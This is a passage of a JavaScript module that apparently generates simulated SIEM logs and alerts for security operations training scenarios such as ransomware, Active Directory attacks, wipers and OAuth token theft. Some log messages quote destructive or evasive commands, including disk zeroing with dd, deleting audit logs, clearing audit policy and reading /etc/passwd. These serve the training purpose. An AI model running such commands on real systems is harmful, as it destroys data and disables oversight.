    { ts: -35, src: "10.0.2.10", type: "endpoint", sev: "high", msg: "AV Alert: Trojan.GenericKD detected on SERVER-WIN01 — quarantine successful" },
  ],
  web_phishing_report: [
    { ts: -20, src: "mail-gw", type: "email", sev: "medium", msg: "User-reported phishing: From 'IT-Support@company-helpdesk.net', subject 'Urgent: Reset your password'" },
    { ts: -18, src: "proxy", type: "web", sev: "high", msg: "URL analyzed: http://company-helpdesk.net/reset — domain registered 2 days ago, flagged by VirusTotal" },
    { ts: -15, src: "proxy", type: "web", sev: "medium", msg: "3 other employees received same email — 1 may have clicked the link (proxy log shows visit)" },
  ],
  unusual_process: [
    { ts: -20, src: "10.0.1.10", type: "process", sev: "high", msg: "EDR: Unknown process launched — C:\\Users\\jsmith\\AppData\\Roaming\\svchost32.exe" },
    { ts: -18, src: "10.0.1.10", type: "process", sev: "medium", msg: "Process hash: d41d8cd98f00b204e9800998ecf8427e — 0 AV detections but suspicious path" },
    { ts: -15, src: "10.0.1.10", type: "network", sev: "high", msg: "svchost32.exe making outbound connections to 5.188.10.220:443 every 60 seconds" },
  ],
  dns_anomaly: [
    { ts: -20, src: "dns-srv", type: "network", sev: "high", msg: "DNS anomaly: DESKTOP-WIN01 making 847 queries/min to *.randomchars.c2server.ru" },
    { ts: -18, src: "dns-srv", type: "network", sev: "high", msg: "DGA pattern detected: subdomains appear algorithmically generated (entropy: 4.8)" },
    { ts: -15, src: "fw-01", type: "firewall", sev: "medium", msg: "Outbound UDP 53 traffic spiked 4,000% above baseline from 10.0.1.10" },
  ],
  privileged_misuse: [
    { ts: -180, src: "dc-01", type: "auth", sev: "medium", msg: "Admin account svc-backup logged in at 11:47 PM — outside normal hours (9am-6pm)" },
    { ts: -170, src: "10.0.2.10", type: "file", sev: "high", msg: "svc-backup accessed \\\\SERVER-WIN01\\Finance\\ — first access to this share ever" },
    { ts: -160, src: "10.0.2.10", type: "file", sev: "high", msg: "82 financial documents accessed in 12 minutes by svc-backup" },
  ],
  rdp_external: [
    { ts: -60, src: "fw-01", type: "firewall", sev: "high", msg: "External RDP access allowed: port 3389 open to 0.0.0.0/0 on SERVER-WIN01 (203.0.113.50)" },
    { ts: -45, src: "10.0.2.10", type: "auth", sev: "high", msg: "RDP login attempt from 91.92.247.11 — username Administrator, failed (attempt 1 of 312)" },
    { ts: -30, src: "10.0.2.10", type: "auth", sev: "critical", msg: "Successful RDP login: Administrator from 91.92.247.11 — possible brute force success" },
  ],
  crypto_miner: [
    { ts: -90, src: "linux-srv-01", type: "process", sev: "high", msg: "CPU usage at 98% sustained for 90 minutes on LINUX-APP01 — abnormal for app server" },
    { ts: -80, src: "linux-srv-01", type: "process", sev: "high", msg: "Process: xmrig running as systemd service 'update-checker' — known crypto miner" },
    { ts: -70, src: "linux-srv-01", type: "network", sev: "high", msg: "Outbound connections to pool.minexmr.com:443 — confirmed mining pool" },
  ],
  fake_helpdesk: [
    { ts: -30, src: "10.0.1.11", type: "auth", sev: "high", msg: "Remote access tool installed: AnyDesk.exe executed by mjohnson after phone call" },
    { ts: -25, src: "10.0.1.11", type: "network", sev: "high", msg: "AnyDesk session established with remote ID 123456789 — external operator controlling desktop" },
    { ts: -20, src: "10.0.1.11", type: "auth", sev: "critical", msg: "Remote operator accessed Chrome password manager and Outlook — credentials likely stolen" },
  ],
  data_on_pastebin: [
    { ts: -60, src: "ti-feed", type: "cloud", sev: "high", msg: "Threat Intel Alert: 847 employee email addresses found on Pastebin with partial password hashes" },
    { ts: -50, src: "ti-feed", type: "cloud", sev: "medium", msg: "Pastebin post timestamp: 3 days ago — may have been shared in underground forums" },
    { ts: -40, src: "dc-01", type: "auth", sev: "medium", msg: "Correlating exposed emails with AD — 23 active accounts identified in leaked data" },
  ],
  shadow_it: [
    { ts: -120, src: "proxy", type: "web", sev: "medium", msg: "Unsanctioned app usage: box.com uploads from 12 users in past 30 days (not in approved app list)" },
    { ts: -100, src: "proxy", type: "web", sev: "high", msg: "Large upload detected: jsmith uploaded 2.3GB to personal Box account box.com/u/jsmith_personal" },
    { ts: -80, src: "dlp-engine", type: "file", sev: "high", msg: "DLP policy match: file 'internal_roadmap_2025.pptx' uploaded to external cloud storage" },
  ],
  ransomware_note_found: [
    { ts: -25, src: "10.0.2.10", type: "file", sev: "critical", msg: "Ransom note discovered: \\\\SERVER-WIN01\\Share\\!READ_ME_NOW.txt (not created by any known process)" },
    { ts: -20, src: "10.0.1.10", type: "process", sev: "high", msg: "Suspicious powershell.exe running on DESKTOP-WIN01 — Base64 encoded commands detected 20 min ago" },
    { ts: -15, src: "fw-01", type: "network", sev: "high", msg: "Blocked outbound beacon to 185.220.101.47:443 (known ransomware staging IP)" },
    { ts: -10, src: "dc-01", type: "auth", sev: "medium", msg: "No mass file encryption detected yet — attacker may be in pre-deployment stage" },
  ],
  supply_chain_attack: [
    { ts: -240, src: "10.0.1.10", type: "process", sev: "medium", msg: "Software update installed: VendorTool v3.4.2 applied automatically on DESKTOP-WIN01" },
    { ts: -230, src: "10.0.1.11", type: "process", sev: "medium", msg: "Software update installed: VendorTool v3.4.2 applied automatically on DESKTOP-WIN02" },
    { ts: -120, src: "10.0.1.10", type: "network", sev: "high", msg: "Outbound beacon to update.vendortool-cdn.net:443 — flagged as newly registered domain (IOC)" },
    { ts: -115, src: "10.0.1.11", type: "network", sev: "high", msg: "Outbound beacon to update.vendortool-cdn.net:443 from DESKTOP-WIN02" },
    { ts: -90, src: "10.0.2.10", type: "process", sev: "critical", msg: "Backdoor DLL loaded: VendorTool.exe side-loaded malicious vendorlib.dll on SERVER-WIN01" },
    { ts: -60, src: "fw-01", type: "firewall", sev: "high", msg: "Blocked C2 to 94.102.49.190:8443 — known supply chain attack C2 from TI feed" },
    { ts: -30, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Credential access: LSASS read by VendorTool process on DC-PRIMARY" },
    { ts: -10, src: "10.0.2.20", type: "network", sev: "critical", msg: "Staged exfil: 1.1GB archive uploaded to 94.102.49.190 via HTTPS" },
  ],
  zero_day_exploit: [
    { ts: -80, src: "10.0.3.10", type: "web", sev: "critical", msg: "Memory corruption: segfault in web app process — heap spray pattern detected from 185.176.27.200" },
    { ts: -75, src: "10.0.3.10", type: "process", sev: "critical", msg: "Kernel exploit attempt: unusual syscall sequence triggering privilege escalation on LINUX-WEB01" },
    { ts: -70, src: "10.0.3.10", type: "process", sev: "critical", msg: "Root shell spawned: uid=0 process launched by www-data — privilege escalation confirmed" },
    { ts: -60, src: "10.0.3.10", type: "process", sev: "high", msg: "Implant dropped: /tmp/.sys_cache (ELF binary, 0 AV detections)" },
    { ts: -50, src: "10.0.3.10", type: "network", sev: "high", msg: "C2 channel established: /tmp/.sys_cache beaconing to 185.176.27.200:4443 every 30s" },
    { ts: -30, src: "fw-01", type: "firewall", sev: "medium", msg: "Anomalous outbound HTTPS from DMZ — traffic pattern matches known implant heartbeat" },
    { ts: -15, src: "10.0.3.10", type: "process", sev: "high", msg: "Reconnaissance: ifconfig, ss -tulpn, cat /etc/passwd executed via implant shell" },
  ],
  active_directory_attack: [
    { ts: -180, src: "dc-01", type: "auth", sev: "critical", msg: "DCSync attack: KRBTGT hash extracted by 10.0.1.10 via DS-Replication-Get-Changes-All" },
    { ts: -170, src: "10.0.1.10", type: "process", sev: "critical", msg: "Mimikatz kerberos::golden command detected — Golden Ticket likely forged" },
    { ts: -120, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Kerberos TGT presented: ticket lifetime 10 years, encrypted with RC4 — anomalous" },
    { ts: -90, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Admin access to DC-PRIMARY using forged ticket from workstation DESKTOP-WIN01" },
    { ts: -60, src: "dc-01", type: "process", sev: "critical", msg: "New domain admin created: svc_maint added to Domain Admins group by forged ticket session" },
    { ts: -40, src: "dc-01", type: "file", sev: "high", msg: "NTDS.dit copied to C:\\Windows\\Temp\\ntds.bak via NTDSUtil — offline cracking possible" },
    { ts: -20, src: "fw-01", type: "network", sev: "high", msg: "Outbound LDAP replication traffic to non-DC host 185.62.190.100 — possible AD data exfil" },
  ],
  ot_ics_intrusion: [
    { ts: -300, src: "10.0.1.10", type: "network", sev: "high", msg: "IT-to-OT firewall rule bypassed: RDP connection from 10.0.1.10 to OT segment 192.168.100.5" },
    { ts: -280, src: "192.168.100.5", type: "auth", sev: "critical", msg: "Successful login to SCADA HMI workstation — user account not authorized for OT access" },
    { ts: -240, src: "192.168.100.5", type: "process", sev: "critical", msg: "SCADA engineering software launched: Wonderware InTouch accessed — PLC config viewed" },
    { ts: -200, src: "192.168.100.10", type: "network", sev: "critical", msg: "PLC Modbus write commands detected — setpoint changes on Pump Controller #3" },
    { ts: -150, src: "192.168.100.5", type: "file", sev: "high", msg: "OT project files copied: PLC ladder logic exported to USB drive on SCADA workstation" },
    { ts: -90, src: "fw-01", type: "firewall", sev: "high", msg: "Blocked: outbound from OT network to 91.92.0.100 — unexpected internet connectivity attempt" },
    { ts: -30, src: "192.168.100.5", type: "process", sev: "critical", msg: "Safety PLC configuration modified: emergency shutdown thresholds altered on Line 4" },
  ],
  multi_stage_apt: [
    { ts: -4320, src: "mail-gw", type: "email", sev: "medium", msg: "Spear-phishing email received by CEO assistant — sender: cfo.alerts@company-finance.net" },
    { ts: -4300, src: "10.0.1.10", type: "process", sev: "high", msg: "Initial access: macro in attached PDF spawned rundll32.exe — stage 1 loader executed" },
    { ts: -3000, src: "10.0.1.10", type: "network", sev: "high", msg: "C2 beaconing established (day 1): jitter-based HTTPS beacon to 185.220.101.200 every 4-6 hours" },
    { ts: -1440, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Credential harvesting: domain admin hash captured via Kerberoasting — 3 service accounts" },
    { ts: -720, src: "10.0.2.10", type: "file", sev: "critical", msg: "Staging: 47GB of intellectual property compressed to encrypted archive on SERVER-WIN01" },
    { ts: -360, src: "fw-01", type: "network", sev: "critical", msg: "Slow exfiltration detected: 200MB/day outbound over 3 months — total 18GB sent to 185.220.101.200" },
    { ts: -60, src: "dc-01", type: "auth", sev: "critical", msg: "Persistence: scheduled task created as SYSTEM to re-establish C2 on reboot" },
    { ts: -10, src: "10.0.2.20", type: "process", sev: "high", msg: "APT tool detected: Cobalt Strike beacon artifact found in memory on LINUX-APP01" },
  ],
  container_escape: [
    { ts: -90, src: "10.0.2.20", type: "process", sev: "high", msg: "Container breakout attempt: pod 'webapp-7f4bc' executing nsenter targeting host PID namespace" },
    { ts: -85, src: "10.0.2.20", type: "process", sev: "critical", msg: "Container escape confirmed: attacker process running as root on host node (pid 1 visible)" },
    { ts: -80, src: "10.0.2.20", type: "file", sev: "critical", msg: "Kubernetes secret access: /var/lib/kubelet/pods/ read — service account tokens extracted" },
    { ts: -70, src: "10.0.2.20", type: "network", sev: "high", msg: "kubectl exec from compromised container: cluster-wide pod enumeration in progress" },
    { ts: -60, src: "10.0.2.20", type: "auth", sev: "critical", msg: "Stolen SA token used to create privileged pod with hostPath mount — full node access" },
    { ts: -40, src: "10.0.2.20", type: "process", sev: "high", msg: "Crypto miner deployed as DaemonSet across all worker nodes in cluster" },
    { ts: -20, src: "fw-01", type: "network", sev: "high", msg: "Outbound to mining pool pool.minexmr.com from 5 cluster node IPs simultaneously" },
  ],
  business_email_compromise: [
    { ts: -120, src: "mail-gw", type: "email", sev: "high", msg: "Spoof alert: email from 'cfo@company-finance.net' (lookalike domain) to finance@company.com" },
    { ts: -115, src: "mail-gw", type: "email", sev: "high", msg: "Email content: urgent wire transfer request for $847,000 — 'vendor payment deadline today'" },
    { ts: -100, src: "mail-gw", type: "email", sev: "medium", msg: "Finance team replied to lookalike domain confirming wire transfer processing" },
    { ts: -60, src: "auth-svc", type: "auth", sev: "high", msg: "CFO mailbox accessed from IP 185.176.27.50 (EU) — CFO is traveling in Asia currently" },
    { ts: -50, src: "auth-svc", type: "auth", sev: "critical", msg: "Mail rule created: BEC-pattern forwarding — delete and forward bank-related emails externally" },
    { ts: -30, src: "mail-gw", type: "email", sev: "high", msg: "Wire confirmation sent from finance — transaction may have been processed" },
    { ts: -10, src: "ti-feed", type: "cloud", sev: "high", msg: "Threat Intel: receiving bank account linked to known BEC fraud group in Nigeria" },
  ],
  ransomware_double_extortion: [
    { ts: -180, src: "10.0.2.20", type: "network", sev: "high", msg: "Slow exfil detected 3 days ago: 200GB uploaded to file.io over 72 hours — missed by threshold alert" },
    { ts: -60, src: "10.0.1.10", type: "endpoint", sev: "critical", msg: "Mass encryption: 12,847 files renamed .BLACKCAT on DESKTOP-WIN01 in 90 seconds" },
    { ts: -58, src: "10.0.1.11", type: "endpoint", sev: "critical", msg: "Mass encryption: DESKTOP-WIN02 affected — 8,200 files encrypted" },
    { ts: -55, src: "10.0.2.10", type: "file", sev: "critical", msg: "Ransom note: \\\\SERVER-WIN01\\Share\\BLACKCAT_DECRYPT.txt — includes dark web leak site URL" },
    { ts: -50, src: "10.0.2.10", type: "file", sev: "critical", msg: "Volume Shadow Copy deletion: all VSS snapshots wiped across 3 servers" },
    { ts: -40, src: "ti-feed", type: "cloud", sev: "critical", msg: "Leak site confirmed: sample of 10 employee records and internal contracts posted publicly" },
    { ts: -20, src: "fw-01", type: "firewall", sev: "high", msg: "C2 beacon blocked: BLACKCAT ransomware known C2 185.220.101.99:443" },
    { ts: -5, src: "dc-01", type: "auth", sev: "high", msg: "Backup server login failed: attacker attempting to encrypt backup repository" },
  ],
  credential_stuffing: [
    { ts: -120, src: "fw-01", type: "firewall", sev: "medium", msg: "Login spike: 45,000 POST /login requests in 10 minutes from 380 different IPs" },
    { ts: -115, src: "auth-svc", type: "auth", sev: "high", msg: "Credential stuffing pattern: low per-IP rate, high overall volume — distributed attack" },
    { ts: -100, src: "auth-svc", type: "auth", sev: "critical", msg: "Successful logins: 847 accounts authenticated successfully using stuffed credentials" },
    { ts: -80, src: "auth-svc", type: "auth", sev: "high", msg: "Account takeover indicators: password change requests spiking for authenticated accounts" },
    { ts: -60, src: "10.0.2.10", type: "file", sev: "high", msg: "Compromised accounts accessing customer PII records — 3,400 records queried in 20 min" },
    { ts: -30, src: "ti-feed", type: "cloud", sev: "high", msg: "Credential source identified: breach database from 2024 leak matching attack patterns" },
    { ts: -10, src: "mail-gw", type: "email", sev: "medium", msg: "Customer complaint spike: 120 support tickets for 'unauthorized account access' in 1 hour" },
  ],
  man_in_the_middle: [
    { ts: -60, src: "10.0.1.10", type: "network", sev: "high", msg: "ARP spoofing detected: MAC 00:11:22:33:44:55 claiming gateway IP 10.0.1.1 on VLAN 10" },
    { ts: -55, src: "10.0.1.11", type: "network", sev: "high", msg: "ARP cache poisoned on DESKTOP-WIN02: default gateway now resolves to attacker MAC" },
    { ts: -50, src: "wlan-sensor", type: "network", sev: "critical", msg: "MITM confirmed: traffic from 10.0.1.11 routed through 10.0.1.50 before reaching gateway" },
    { ts: -40, src: "auth-svc", type: "auth", sev: "critical", msg: "Credential intercept suspected: HTTP basic auth credentials captured in cleartext traffic" },
    { ts: -30, src: "10.0.1.50", type: "network", sev: "high", msg: "Session hijack attempt: attacker copying session cookies from intercepted HTTP responses" },
    { ts: -20, src: "auth-svc", type: "auth", sev: "critical", msg: "Replayed session token: attacker authenticated to internal app using stolen session cookie" },
    { ts: -10, src: "dc-01", type: "auth", sev: "high", msg: "NTLM relay attack detected: captured credentials relayed to DC-PRIMARY for lateral access" },
  ],
  fileless_malware: [
    { ts: -90, src: "10.0.1.10", type: "process", sev: "critical", msg: "Malicious payload injected into PowerShell memory: no file written to disk — living off the land" },
    { ts: -85, src: "10.0.1.10", type: "process", sev: "high", msg: "WMI subscription created for persistence: ActiveScriptEventConsumer executing base64 PS" },
    { ts: -80, src: "10.0.1.10", type: "process", sev: "high", msg: "Process hollowing: svchost.exe spawned with suspicious parent and injected payload" },
    { ts: -70, src: "10.0.1.10", type: "network", sev: "high", msg: "C2 over HTTPS: encrypted beacon to 185.62.190.50:443 every 60s from svchost.exe" },
    { ts: -50, src: "10.0.2.5", type: "auth", sev: "critical", msg: "Fileless credential theft: LSASS minidump via comsvcs.dll MiniDump — no dropper detected" },
    { ts: -30, src: "10.0.2.10", type: "process", sev: "high", msg: "Registry run key modified: encoded PowerShell payload added for boot persistence" },
    { ts: -10, src: "fw-01", type: "firewall", sev: "high", msg: "Fileless malware C2 blocked at perimeter — endpoint remains infected in memory" },
  ],
  kerberoasting: [
    { ts: -45, src: "dc-01", type: "auth", sev: "high", msg: "Abnormal TGS requests: jsmith requested 47 service tickets in 2 minutes (normal: 1-2/hour)" },
    { ts: -43, src: "dc-01", type: "auth", sev: "high", msg: "SPN enumeration: SetSPN queries for all SPNs in domain from DESKTOP-WIN01 by jsmith" },
    { ts: -40, src: "dc-01", type: "auth", sev: "critical", msg: "High-value targets: TGS tickets requested for svc-sql, svc-backup, svc-web (all RC4 encrypted)" },
    { ts: -30, src: "10.0.1.10", type: "process", sev: "high", msg: "Ticket extraction tool detected: Rubeus.exe hash pattern in memory on DESKTOP-WIN01" },
    { ts: -20, src: "10.0.1.10", type: "network", sev: "medium", msg: "Hashcat-pattern outbound: extracted tickets transferred to external IP for offline cracking" },
    { ts: -10, src: "dc-01", type: "auth", sev: "critical", msg: "Cracked credential used: svc-sql account logged in from foreign IP 91.108.56.50" },
  ],
  siem_evasion: [
    { ts: -120, src: "10.0.1.10", type: "process", sev: "high", msg: "SIEM agent tampered: Splunk Universal Forwarder service stopped on DESKTOP-WIN01" },
    { ts: -115, src: "10.0.1.11", type: "process", sev: "high", msg: "SIEM agent tampered: Splunk forwarder stopped on DESKTOP-WIN02 — log gap begins" },
    { ts: -100, src: "10.0.2.10", type: "process", sev: "critical", msg: "Windows Event Log cleared: Security, System, Application logs wiped on SERVER-WIN01" },
    { ts: -90, src: "dc-01", type: "process", sev: "critical", msg: "Audit policy disabled: auditpol.exe /clear and Security event log wiped on DC-PRIMARY" },
    { ts: -70, src: "10.0.2.20", type: "process", sev: "high", msg: "Linux auditd stopped: systemctl stop auditd && rm /var/log/audit/audit.log on LINUX-APP01" },
    { ts: -50, src: "fw-01", type: "firewall", sev: "high", msg: "Firewall log suppression: syslog forwarding to SIEM disrupted — configuration tampered" },
    { ts: -20, src: "10.0.2.10", type: "process", sev: "critical", msg: "Primary objective begins: ransomware pre-staging detected after 100-minute log blackout" },
  ],
  wiper_malware: [
    { ts: -60, src: "10.0.1.10", type: "endpoint", sev: "critical", msg: "MBR overwrite detected: DESKTOP-WIN01 disk sector 0 written by non-OS process" },
    { ts: -58, src: "10.0.1.11", type: "endpoint", sev: "critical", msg: "MBR overwrite detected: DESKTOP-WIN02 — system will be unbootable on next restart" },
    { ts: -55, src: "10.0.2.10", type: "file", sev: "critical", msg: "File wiper: recursive deletion of C:\\ and all network shares on SERVER-WIN01" },
    { ts: -50, src: "10.0.2.20", type: "process", sev: "critical", msg: "Wiper on Linux: dd if=/dev/zero of=/dev/sda — disk zeroing in progress on LINUX-APP01" },
    { ts: -40, src: "dc-01", type: "process", sev: "critical", msg: "DC targeted: AD database deletion attempt — NTDS.dit deletion command executed" },
    { ts: -30, src: "fw-01", type: "firewall", sev: "high", msg: "C2 exfil complete before wipe: 50GB sent to attacker prior to destructive phase" },
    { ts: -10, src: "10.0.2.10", type: "endpoint", sev: "critical", msg: "Backup server targeted: wiper spreading to backup repository — immutable backups may be last resort" },
  ],
  oauth_token_theft: [
    { ts: -90, src: "10.0.1.10", type: "process", sev: "high", msg: "Credential theft: browser token store read — Chrome token database accessed by external process" },
    { ts: -85, src: "auth-svc", type: "auth", sev: "critical", msg: "Stolen refresh token used: API call from IP 185.62.190.100 using jsmith's Office 365 token" },
    { ts: -80, src: "auth-svc", type: "auth", sev: "critical", msg: "Token replay: no MFA triggered — refresh token bypasses MFA requirement" },
    { ts: -70, src: "mail-gw", type: "email", sev: "high", msg: "Email access via Graph API: all jsmith mailbox folders read from attacker IP" },
    { ts: -60, src: "auth-svc", type: "auth", sev: "high", msg: "SharePoint access via stolen token: confidential project files downloaded via API" },
    { ts: -40, src: "auth-svc", type: "auth", sev: "high", msg: "Token used to register new OAuth app: 'BackupSync' granted Mail.Read and Files.ReadWrite" },
    { ts: -20, src: "mail-gw", type: "email", sev: "high", msg: "Persistence via OAuth app: all future emails auto-forwarded to attacker via registered app" },
  ],
};

export function generateLogs(scenarioId) {
  const templates = LOG_TEMPLATES[scenarioId] || LOG_TEMPLATES["phishing_compromise"];
  const now = Date.now();
  return templates.map((t, i) => ({
    id: `log-${i}`,
    timestamp: new Date(now + t.ts * 60000).toISOString(),
    source: t.src,
    type: t.type,
    severity: t.sev,
    message: t.msg,
  }));
}

// ─── Alert Generator ──────────────────────────────────────────────────────────

const ALERT_TEMPLATES = {
  ransomware_outbreak: [
    { id: "a1", title: "Ransomware Activity Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Impact", rule: "SIGMA: Mass file encryption" },
    { id: "a2", title: "Volume Shadow Copy Deletion", sev: "high", src: "SERVER-WIN01", tactic: "Defense Evasion", rule: "SIGMA: vssadmin delete shadows" },
    { id: "a3", title: "C2 Beacon Outbound", sev: "high", src: "DESKTOP-WIN01", tactic: "Command and Control", rule: "TI: Known ransomware C2 IP" },
    { id: "a4", title: "Lateral Movement via WMI", sev: "high", src: "DESKTOP-WIN01", tactic: "Lateral Movement", rule: "SIGMA: WMI remote exec" },
    { id: "a5", title: "Backup Service Terminated", sev: "medium", src: "SERVER-WIN01", tactic: "Impact", rule: "SIGMA: Backup service stop" },
  ],
  phishing_compromise: [
    { id: "a1", title: "Suspicious OAuth Grant", sev: "high", src: "jsmith@company.com", tactic: "Persistence", rule: "DLP: Unknown OAuth app consent" },
    { id: "a2", title: "Impossible Travel Detected", sev: "critical", src: "jsmith@company.com", tactic: "Initial Access", rule: "UBA: Simultaneous logins different countries" },
    { id: "a3", title: "Email Forwarding Rule Created", sev: "high", src: "mail-gateway", tactic: "Collection", rule: "SIGMA: Inbox forwarding to external" },
    { id: "a4", title: "Bulk File Download", sev: "medium", src: "DESKTOP-WIN01", tactic: "Collection", rule: "DLP: Mass file access anomaly" },
  ],
  brute_force_vpn: [
    { id: "a1", title: "VPN Brute Force Attack", sev: "high", src: "45.95.147.23", tactic: "Credential Access", rule: "THRESHOLD: >100 failed VPN auths/min" },
    { id: "a2", title: "Account Lockout: mjohnson", sev: "medium", src: "VPN-GATEWAY", tactic: "Credential Access", rule: "AUTH: Account lockout threshold" },
    { id: "a3", title: "Successful Auth After Lockout", sev: "critical", src: "VPN-GATEWAY", tactic: "Initial Access", rule: "AUTH: Auth success post-lockout foreign IP" },
    { id: "a4", title: "Internal Network Scan from VPN", sev: "high", src: "10.10.0.55", tactic: "Discovery", rule: "SIGMA: Network scan detected" },
  ],
  lateral_movement: [
    { id: "a1", title: "Pass-the-Hash Attack", sev: "critical", src: "DESKTOP-WIN01", tactic: "Lateral Movement", rule: "SIGMA: Pass-the-Hash NTLM" },
    { id: "a2", title: "Credential Dumping (Mimikatz)", sev: "critical", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "SIGMA: lsass memory access" },
    { id: "a3", title: "DCSync Attack Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Credential Access", rule: "SIGMA: Replication from non-DC" },
    { id: "a4", title: "Remote WMI Execution", sev: "high", src: "DESKTOP-WIN01", tactic: "Execution", rule: "SIGMA: WMI process creation" },
    { id: "a5", title: "NTDS.dit Access Attempt", sev: "critical", src: "DC-PRIMARY", tactic: "Credential Access", rule: "SIGMA: NTDS.dit access" },
  ],
  data_exfiltration: [
    { id: "a1", title: "Large Outbound Data Transfer", sev: "critical", src: "LINUX-APP01", tactic: "Exfiltration", rule: "DLP: >1GB outbound to cloud storage" },
    { id: "a2", title: "Log File Tampered", sev: "high", src: "LINUX-APP01", tactic: "Defense Evasion", rule: "SIGMA: Log file truncation" },
    { id: "a3", title: "DNS Tunneling Detected", sev: "high", src: "LINUX-APP01", tactic: "Exfiltration", rule: "SIGMA: Abnormal DNS TXT queries" },
    { id: "a4", title: "Sensitive Data Bulk Access", sev: "high", src: "LINUX-APP01", tactic: "Collection", rule: "DLP: Database bulk read anomaly" },
  ],
  insider_threat: [
    { id: "a1", title: "After-Hours Data Access", sev: "medium", src: "DESKTOP-WIN02", tactic: "Collection", rule: "UBA: File access outside business hours" },
    { id: "a2", title: "Audit Log Cleared", sev: "high", src: "DESKTOP-WIN02", tactic: "Defense Evasion", rule: "SIGMA: auditpol clear" },
    { id: "a3", title: "USB Data Transfer", sev: "high", src: "DESKTOP-WIN02", tactic: "Exfiltration", rule: "DLP: Removable media data copy" },
    { id: "a4", title: "Cloud Upload Anomaly", sev: "medium", src: "DESKTOP-WIN02", tactic: "Exfiltration", rule: "DLP: Dropbox bulk upload" },
  ],
  web_compromise: [
    { id: "a1", title: "SQL Injection Detected", sev: "high", src: "LINUX-WEB01", tactic: "Initial Access", rule: "WAF: SQLi pattern matched" },
    { id: "a2", title: "Web Shell Uploaded", sev: "critical", src: "LINUX-WEB01", tactic: "Persistence", rule: "SIGMA: PHP shell file created" },
    { id: "a3", title: "Reverse Shell Established", sev: "critical", src: "LINUX-WEB01", tactic: "Execution", rule: "SIGMA: Outbound shell connection" },
    { id: "a4", title: "Internal Network Scan from DMZ", sev: "high", src: "LINUX-WEB01", tactic: "Discovery", rule: "SIGMA: Network scan from web zone" },
  ],
  cloud_compromise: [
    { id: "a1", title: "AWS Credentials Exposed on GitHub", sev: "critical", src: "github.com", tactic: "Initial Access", rule: "TI: Public credential exposure" },
    { id: "a2", title: "API Access from Unknown IP", sev: "critical", src: "185.176.27.101", tactic: "Initial Access", rule: "CSPM: Anomalous API source IP" },
    { id: "a3", title: "Privileged IAM User Created", sev: "critical", src: "aws-api", tactic: "Persistence", rule: "CSPM: Admin IAM user creation" },
    { id: "a4", title: "S3 Bucket Made Public", sev: "critical", src: "aws-api", tactic: "Exfiltration", rule: "CSPM: Public S3 ACL change" },
    { id: "a5", title: "CloudTrail Logging Disabled", sev: "high", src: "aws-api", tactic: "Defense Evasion", rule: "CSPM: Audit log disabled" },
  ],
  suspicious_login: [
    { id: "a1", title: "Off-Hours Login Detected", sev: "medium", src: "auth-svc", tactic: "Initial Access", rule: "UBA: Login outside business hours" },
    { id: "a2", title: "Login from Unrecognized Location", sev: "high", src: "auth-svc", tactic: "Initial Access", rule: "UBA: Geolocation anomaly" },
  ],
  malware_usb: [
    { id: "a1", title: "Malicious USB Executable Detected", sev: "critical", src: "DESKTOP-WIN01", tactic: "Initial Access", rule: "AV: Trojan.AutoRun detected" },
    { id: "a2", title: "Suspicious Process After USB Insert", sev: "high", src: "DESKTOP-WIN01", tactic: "Execution", rule: "SIGMA: cmd spawned from explorer" },
  ],
  spam_campaign: [
    { id: "a1", title: "Malicious Attachment Campaign", sev: "high", src: "mail-gw", tactic: "Initial Access", rule: "DLP: Macro-enabled doc mass delivery" },
    { id: "a2", title: "Macro Execution Detected", sev: "critical", src: "DESKTOP-WIN02", tactic: "Execution", rule: "SIGMA: Office macro execution" },
  ],
  password_spray: [
    { id: "a1", title: "Password Spray Attack Detected", sev: "high", src: "91.108.56.180", tactic: "Credential Access", rule: "THRESHOLD: Single IP, many accounts" },
    { id: "a2", title: "Successful Login After Spray", sev: "critical", src: "auth-svc", tactic: "Initial Access", rule: "AUTH: Spray success — helpdesk01" },
  ],
  port_scan: [
    { id: "a1", title: "External Port Scan Detected", sev: "medium", src: "185.234.219.5", tactic: "Reconnaissance", rule: "FW: >5000 connection attempts/min" },
    { id: "a2", title: "Open Ports Enumerated", sev: "medium", src: "fw-01", tactic: "Reconnaissance", rule: "FW: Scan response on ports 80,443,8080" },
  ],
  rogue_wifi: [
    { id: "a1", title: "Evil Twin AP Detected", sev: "high", src: "wlan-sensor", tactic: "Collection", rule: "WLAN: Duplicate SSID on unknown MAC" },
    { id: "a2", title: "Corporate Devices on Rogue AP", sev: "high", src: "wlan-sensor", tactic: "Collection", rule: "WLAN: Managed device joined unauthorized AP" },
  ],
  account_lockout: [
    { id: "a1", title: "Mass Account Lockout Event", sev: "high", src: "dc-01", tactic: "Credential Access", rule: "AUTH: >20 lockouts in 5 minutes" },
    { id: "a2", title: "Brute Force from External IP", sev: "high", src: "vpn-gw", tactic: "Credential Access", rule: "THRESHOLD: Auth storms from 91.92.0.0/16" },
  ],
  malicious_macro: [
    { id: "a1", title: "Office Macro Execution", sev: "critical", src: "DESKTOP-WIN01", tactic: "Execution", rule: "SIGMA: WINWORD spawned powershell" },
    { id: "a2", title: "Encoded PowerShell Command", sev: "high", src: "DESKTOP-WIN01", tactic: "Execution", rule: "SIGMA: powershell -enc detected" },
    { id: "a3", title: "C2 Connection Attempt", sev: "high", src: "DESKTOP-WIN01", tactic: "Command and Control", rule: "TI: Known C2 IP contacted" },
  ],
  dlp_alert: [
    { id: "a1", title: "Credit Card Data Exfiltration", sev: "high", src: "mail-gw", tactic: "Exfiltration", rule: "DLP: PCI data in outbound email" },
    { id: "a2", title: "Data Sent to Personal Email", sev: "high", src: "mail-gw", tactic: "Exfiltration", rule: "DLP: Corporate data → gmail.com" },
  ],
  av_detection: [
    { id: "a1", title: "Trojan Detected on Workstations", sev: "high", src: "DESKTOP-WIN01", tactic: "Execution", rule: "AV: Trojan.GenericKD detected" },
    { id: "a2", title: "Multiple Endpoints Infected", sev: "high", src: "Multiple", tactic: "Lateral Movement", rule: "AV: Same family on 3+ hosts" },
  ],
  web_phishing_report: [
    { id: "a1", title: "Phishing Email Reported", sev: "medium", src: "mail-gw", tactic: "Initial Access", rule: "USER: Phishing report submitted" },
    { id: "a2", title: "Malicious URL in Email", sev: "high", src: "proxy", tactic: "Initial Access", rule: "TI: New domain in phishing email" },
  ],
  unusual_process: [
